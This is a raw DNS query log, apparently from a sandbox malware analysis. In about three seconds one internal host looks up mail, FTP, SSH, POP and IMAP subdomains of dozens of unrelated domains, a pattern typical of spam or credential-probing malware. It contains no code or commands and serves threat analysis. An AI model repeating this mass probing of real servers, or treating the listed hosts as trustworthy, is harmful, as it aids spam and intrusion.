Dec 22, 2023 21:14:53.036128998 CET	192.168.2.4	1.1.1.1	0xd454	Standard query (0)	mail.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.036562920 CET	192.168.2.4	1.1.1.1	0xdfdc	Standard query (0)	ftp.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.036850929 CET	192.168.2.4	1.1.1.1	0x9451	Standard query (0)	ftp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041048050 CET	192.168.2.4	1.1.1.1	0xe07a	Standard query (0)	ww1.dl-it.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041120052 CET	192.168.2.4	1.1.1.1	0xa73b	Standard query (0)	mail.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041146040 CET	192.168.2.4	1.1.1.1	0x458f	Standard query (0)	ftp.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041146040 CET	192.168.2.4	1.1.1.1	0xbe8	Standard query (0)	mail.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041182995 CET	192.168.2.4	1.1.1.1	0x4aca	Standard query (0)	ftp.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041182995 CET	192.168.2.4	1.1.1.1	0xa576	Standard query (0)	mail.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041201115 CET	192.168.2.4	1.1.1.1	0x8fb2	Standard query (0)	mail.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041343927 CET	192.168.2.4	1.1.1.1	0x4a21	Standard query (0)	ftp.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.041549921 CET	192.168.2.4	1.1.1.1	0x1ebb	Standard query (0)	ftp.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.084496975 CET	192.168.2.4	1.1.1.1	0x8229	Standard query (0)	ftp.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.084703922 CET	192.168.2.4	1.1.1.1	0xbe35	Standard query (0)	ftp.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.087877035 CET	192.168.2.4	1.1.1.1	0x489d	Standard query (0)	ftp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.087877035 CET	192.168.2.4	1.1.1.1	0xcd41	Standard query (0)	ftp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.088450909 CET	192.168.2.4	1.1.1.1	0xf3b5	Standard query (0)	ftp.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.089224100 CET	192.168.2.4	1.1.1.1	0x668c	Standard query (0)	mail.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.090046883 CET	192.168.2.4	1.1.1.1	0x671f	Standard query (0)	ftp.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.090645075 CET	192.168.2.4	1.1.1.1	0xc63a	Standard query (0)	mail.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.090785980 CET	192.168.2.4	1.1.1.1	0xbf43	Standard query (0)	ftp.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.091175079 CET	192.168.2.4	1.1.1.1	0xa0e2	Standard query (0)	ftp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.091976881 CET	192.168.2.4	1.1.1.1	0x2f2c	Standard query (0)	mail.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.093425989 CET	192.168.2.4	1.1.1.1	0x67f9	Standard query (0)	ftp.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.093425989 CET	192.168.2.4	1.1.1.1	0x1d45	Standard query (0)	ftp.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.093748093 CET	192.168.2.4	1.1.1.1	0xa7dd	Standard query (0)	mail.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.103245974 CET	192.168.2.4	1.1.1.1	0xcee7	Standard query (0)	ftp.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.410687923 CET	192.168.2.4	1.1.1.1	0x543	Standard query (0)	pop.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411062002 CET	192.168.2.4	1.1.1.1	0x4913	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411112070 CET	192.168.2.4	1.1.1.1	0x47f5	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411112070 CET	192.168.2.4	1.1.1.1	0xee5c	Standard query (0)	ssh.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411154985 CET	192.168.2.4	1.1.1.1	0xdeb7	Standard query (0)	ftp.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411154985 CET	192.168.2.4	1.1.1.1	0xa60c	Standard query (0)	ftp.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411196947 CET	192.168.2.4	1.1.1.1	0x34a2	Standard query (0)	ftp.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411196947 CET	192.168.2.4	1.1.1.1	0x5997	Standard query (0)	ftp.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411230087 CET	192.168.2.4	1.1.1.1	0x78ba	Standard query (0)	ftp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411231041 CET	192.168.2.4	1.1.1.1	0xd348	Standard query (0)	ftp.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411288977 CET	192.168.2.4	1.1.1.1	0xd454	Standard query (0)	mail.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411376953 CET	192.168.2.4	1.1.1.1	0x1ef6	Standard query (0)	pop.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411376953 CET	192.168.2.4	1.1.1.1	0x7081	Standard query (0)	ftp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411418915 CET	192.168.2.4	1.1.1.1	0xdfdc	Standard query (0)	ftp.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411418915 CET	192.168.2.4	1.1.1.1	0x9451	Standard query (0)	ftp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411448956 CET	192.168.2.4	1.1.1.1	0xbe35	Standard query (0)	ftp.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411448956 CET	192.168.2.4	1.1.1.1	0x1ebb	Standard query (0)	ftp.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411484957 CET	192.168.2.4	1.1.1.1	0xa7dd	Standard query (0)	mail.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411484957 CET	192.168.2.4	1.1.1.1	0x8229	Standard query (0)	ftp.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411501884 CET	192.168.2.4	1.1.1.1	0x1d45	Standard query (0)	ftp.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411501884 CET	192.168.2.4	1.1.1.1	0x668c	Standard query (0)	mail.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411540031 CET	192.168.2.4	1.1.1.1	0xf3b5	Standard query (0)	ftp.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411540031 CET	192.168.2.4	1.1.1.1	0xa0e2	Standard query (0)	ftp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.411659002 CET	192.168.2.4	1.1.1.1	0xc63a	Standard query (0)	mail.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.421612978 CET	192.168.2.4	1.1.1.1	0x671f	Standard query (0)	ftp.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.421612978 CET	192.168.2.4	1.1.1.1	0x67f9	Standard query (0)	ftp.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.421642065 CET	192.168.2.4	1.1.1.1	0xbf43	Standard query (0)	ftp.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.421642065 CET	192.168.2.4	1.1.1.1	0xcee7	Standard query (0)	ftp.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.421673059 CET	192.168.2.4	1.1.1.1	0x2f2c	Standard query (0)	mail.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.422455072 CET	192.168.2.4	1.1.1.1	0xb1c2	Standard query (0)	ssh.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.974742889 CET	192.168.2.4	1.1.1.1	0xff5a	Standard query (0)	mail.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.981066942 CET	192.168.2.4	1.1.1.1	0x2488	Standard query (0)	ssh.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.010025978 CET	192.168.2.4	1.1.1.1	0xf7c5	Standard query (0)	ssh.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.010854959 CET	192.168.2.4	1.1.1.1	0x8052	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.053539991 CET	192.168.2.4	1.1.1.1	0xe7c6	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.061060905 CET	192.168.2.4	1.1.1.1	0xfbff	Standard query (0)	ftp.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.061554909 CET	192.168.2.4	1.1.1.1	0x24ad	Standard query (0)	mail.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.067370892 CET	192.168.2.4	1.1.1.1	0x60d6	Standard query (0)	ssh.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.233664036 CET	192.168.2.4	1.1.1.1	0xe7c6	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.248990059 CET	192.168.2.4	1.1.1.1	0x60d6	Standard query (0)	ssh.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.249353886 CET	192.168.2.4	1.1.1.1	0x368b	Standard query (0)	mail.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.249689102 CET	192.168.2.4	1.1.1.1	0x20a2	Standard query (0)	imap.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.250912905 CET	192.168.2.4	1.1.1.1	0x9ce6	Standard query (0)	ssh.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.251338005 CET	192.168.2.4	1.1.1.1	0x5a57	Standard query (0)	ssh.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.251635075 CET	192.168.2.4	1.1.1.1	0xf18f	Standard query (0)	mail.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.252147913 CET	192.168.2.4	1.1.1.1	0xcf85	Standard query (0)	mail.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.252388954 CET	192.168.2.4	1.1.1.1	0xc0d6	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.255913973 CET	192.168.2.4	1.1.1.1	0x61fe	Standard query (0)	mail.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.256521940 CET	192.168.2.4	1.1.1.1	0x39b9	Standard query (0)	mail.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.266967058 CET	192.168.2.4	1.1.1.1	0xb2ea	Standard query (0)	mail.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.267709017 CET	192.168.2.4	1.1.1.1	0x432a	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.295253992 CET	192.168.2.4	1.1.1.1	0x6e38	Standard query (0)	pop.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.365612984 CET	192.168.2.4	1.1.1.1	0xff13	Standard query (0)	mail.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.380270958 CET	192.168.2.4	1.1.1.1	0x6b98	Standard query (0)	mail.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.418863058 CET	192.168.2.4	1.1.1.1	0x4c4d	Standard query (0)	ftp.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.418946028 CET	192.168.2.4	1.1.1.1	0x20a2	Standard query (0)	imap.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.419001102 CET	192.168.2.4	1.1.1.1	0xc0d6	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.427623987 CET	192.168.2.4	1.1.1.1	0x2fb7	Standard query (0)	ftp.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.428118944 CET	192.168.2.4	1.1.1.1	0xa1ee	Standard query (0)	ftp.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.435427904 CET	192.168.2.4	1.1.1.1	0xe821	Standard query (0)	mail.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.435975075 CET	192.168.2.4	1.1.1.1	0xe5f	Standard query (0)	ftp.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.436244011 CET	192.168.2.4	1.1.1.1	0xb2e	Standard query (0)	mail.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.470586061 CET	192.168.2.4	1.1.1.1	0x1569	Standard query (0)	pop.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.471350908 CET	192.168.2.4	1.1.1.1	0x1add	Standard query (0)	pop3.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.471752882 CET	192.168.2.4	1.1.1.1	0x2b32	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.544222116 CET	192.168.2.4	1.1.1.1	0x97f7	Standard query (0)	ssh.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.544553041 CET	192.168.2.4	1.1.1.1	0x5c59	Standard query (0)	ssh.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.546192884 CET	192.168.2.4	1.1.1.1	0xaf92	Standard query (0)	mail.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.607949018 CET	192.168.2.4	1.1.1.1	0x66ee	Standard query (0)	www.wika.co.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.609430075 CET	192.168.2.4	1.1.1.1	0x63f5	Standard query (0)	www.51goabroad.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.628773928 CET	192.168.2.4	1.1.1.1	0xb6ca	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.629559040 CET	192.168.2.4	1.1.1.1	0x2b32	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.629667044 CET	192.168.2.4	1.1.1.1	0x1add	Standard query (0)	pop3.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.738559961 CET	192.168.2.4	1.1.1.1	0xb042	Standard query (0)	souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.739779949 CET	192.168.2.4	1.1.1.1	0x30cb	Standard query (0)	srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.740129948 CET	192.168.2.4	1.1.1.1	0xb8bb	Standard query (0)	dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.740557909 CET	192.168.2.4	1.1.1.1	0x2ded	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.740856886 CET	192.168.2.4	1.1.1.1	0x5e8d	Standard query (0)	rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.748387098 CET	192.168.2.4	1.1.1.1	0xb5e2	Standard query (0)	acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.748387098 CET	192.168.2.4	1.1.1.1	0xcba	Standard query (0)	enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.748780012 CET	192.168.2.4	1.1.1.1	0x4474	Standard query (0)	mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.749416113 CET	192.168.2.4	1.1.1.1	0xa8b3	Standard query (0)	djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.749610901 CET	192.168.2.4	1.1.1.1	0xba40	Standard query (0)	91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.749824047 CET	192.168.2.4	1.1.1.1	0xc140	Standard query (0)	hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.750308037 CET	192.168.2.4	1.1.1.1	0xbfe1	Standard query (0)	bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.750533104 CET	192.168.2.4	1.1.1.1	0x6766	Standard query (0)	jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.750823975 CET	192.168.2.4	1.1.1.1	0xee62	Standard query (0)	rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.751138926 CET	192.168.2.4	1.1.1.1	0x9a36	Standard query (0)	www.pcfocus.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.802809000 CET	192.168.2.4	1.1.1.1	0x5397	Standard query (0)	bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.803036928 CET	192.168.2.4	1.1.1.1	0x1f94	Standard query (0)	studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.803246021 CET	192.168.2.4	1.1.1.1	0xcf29	Standard query (0)	piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.807279110 CET	192.168.2.4	1.1.1.1	0x66ee	Standard query (0)	www.wika.co.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.807279110 CET	192.168.2.4	1.1.1.1	0x63f5	Standard query (0)	www.51goabroad.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.807389021 CET	192.168.2.4	1.1.1.1	0xb6ca	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.807682991 CET	192.168.2.4	1.1.1.1	0x96f2	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.807881117 CET	192.168.2.4	1.1.1.1	0x3a44	Standard query (0)	chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.808104992 CET	192.168.2.4	1.1.1.1	0x6569	Standard query (0)	select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.808243036 CET	192.168.2.4	1.1.1.1	0xcb29	Standard query (0)	vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.808420897 CET	192.168.2.4	1.1.1.1	0xa40d	Standard query (0)	hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.808764935 CET	192.168.2.4	1.1.1.1	0xb4f9	Standard query (0)	djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.808764935 CET	192.168.2.4	1.1.1.1	0x2189	Standard query (0)	aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.809005022 CET	192.168.2.4	1.1.1.1	0x397f	Standard query (0)	hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.809222937 CET	192.168.2.4	1.1.1.1	0x1fed	Standard query (0)	nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.809381962 CET	192.168.2.4	1.1.1.1	0x16f0	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.809854031 CET	192.168.2.4	1.1.1.1	0x5eb	Standard query (0)	arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.810898066 CET	192.168.2.4	1.1.1.1	0xad5d	Standard query (0)	taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.812475920 CET	192.168.2.4	1.1.1.1	0xaaff	Standard query (0)	mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.816979885 CET	192.168.2.4	1.1.1.1	0x505c	Standard query (0)	263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.859251022 CET	192.168.2.4	1.1.1.1	0xd9d8	Standard query (0)	ssh.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908320904 CET	192.168.2.4	1.1.1.1	0xb8bb	Standard query (0)	dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908380032 CET	192.168.2.4	1.1.1.1	0x30cb	Standard query (0)	srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908417940 CET	192.168.2.4	1.1.1.1	0x5e8d	Standard query (0)	rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908417940 CET	192.168.2.4	1.1.1.1	0x2ded	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908456087 CET	192.168.2.4	1.1.1.1	0xb5e2	Standard query (0)	acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908456087 CET	192.168.2.4	1.1.1.1	0x9a36	Standard query (0)	www.pcfocus.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908488989 CET	192.168.2.4	1.1.1.1	0xc140	Standard query (0)	hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.908488989 CET	192.168.2.4	1.1.1.1	0xa8b3	Standard query (0)	djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.988734961 CET	192.168.2.4	1.1.1.1	0xcf29	Standard query (0)	piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.988802910 CET	192.168.2.4	1.1.1.1	0x96f2	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:54.988821983 CET	192.168.2.4	1.1.1.1	0x16f0	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.390377998 CET	192.168.2.4	1.1.1.1	0xf6ac	Standard query (0)	ssh.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.415034056 CET	192.168.2.4	1.1.1.1	0xdba4	Standard query (0)	ssh.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.426171064 CET	192.168.2.4	1.1.1.1	0xd59c	Standard query (0)	ssh.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.459357023 CET	192.168.2.4	1.1.1.1	0xbdf9	Standard query (0)	ssh.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.575778961 CET	192.168.2.4	1.1.1.1	0x52e4	Standard query (0)	e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.802892923 CET	192.168.2.4	1.1.1.1	0xf6ac	Standard query (0)	ssh.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.803246975 CET	192.168.2.4	1.1.1.1	0xb574	Standard query (0)	ssh.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.803560019 CET	192.168.2.4	1.1.1.1	0xed48	Standard query (0)	ftp.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.816610098 CET	192.168.2.4	1.1.1.1	0xcfa2	Standard query (0)	mail.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.817008018 CET	192.168.2.4	1.1.1.1	0xe6f6	Standard query (0)	ssh.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.842787027 CET	192.168.2.4	1.1.1.1	0x4456	Standard query (0)	sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.843332052 CET	192.168.2.4	1.1.1.1	0x6985	Standard query (0)	ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.843775988 CET	192.168.2.4	1.1.1.1	0x552d	Standard query (0)	joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.844399929 CET	192.168.2.4	1.1.1.1	0x93d5	Standard query (0)	ssh.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.844399929 CET	192.168.2.4	1.1.1.1	0x2809	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.844775915 CET	192.168.2.4	1.1.1.1	0x8c0c	Standard query (0)	saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.845136881 CET	192.168.2.4	1.1.1.1	0x1298	Standard query (0)	ssh.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.882364988 CET	192.168.2.4	1.1.1.1	0x7b77	Standard query (0)	ssh.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.886624098 CET	192.168.2.4	1.1.1.1	0x2243	Standard query (0)	ssh.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.887161970 CET	192.168.2.4	1.1.1.1	0x432f	Standard query (0)	ssh.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.887423992 CET	192.168.2.4	1.1.1.1	0x4b62	Standard query (0)	154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.892525911 CET	192.168.2.4	1.1.1.1	0x297c	Standard query (0)	ssh.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.893199921 CET	192.168.2.4	1.1.1.1	0x2cbe	Standard query (0)	pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.903141975 CET	192.168.2.4	1.1.1.1	0x7fd6	Standard query (0)	cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.906193972 CET	192.168.2.4	1.1.1.1	0xdc2f	Standard query (0)	ssh.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.907100916 CET	192.168.2.4	1.1.1.1	0xa3c5	Standard query (0)	freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.907444954 CET	192.168.2.4	1.1.1.1	0x1803	Standard query (0)	pop.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.954783916 CET	192.168.2.4	1.1.1.1	0x4283	Standard query (0)	9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.958053112 CET	192.168.2.4	1.1.1.1	0x1254	Standard query (0)	ssh.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.958053112 CET	192.168.2.4	1.1.1.1	0x98c1	Standard query (0)	ssh.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.958774090 CET	192.168.2.4	1.1.1.1	0x9e80	Standard query (0)	ssh.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.958774090 CET	192.168.2.4	1.1.1.1	0xb82	Standard query (0)	hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.961066008 CET	192.168.2.4	1.1.1.1	0xd1e7	Standard query (0)	ssh.sitehalogen.com	A (IP address)	IN (0x0001)	false
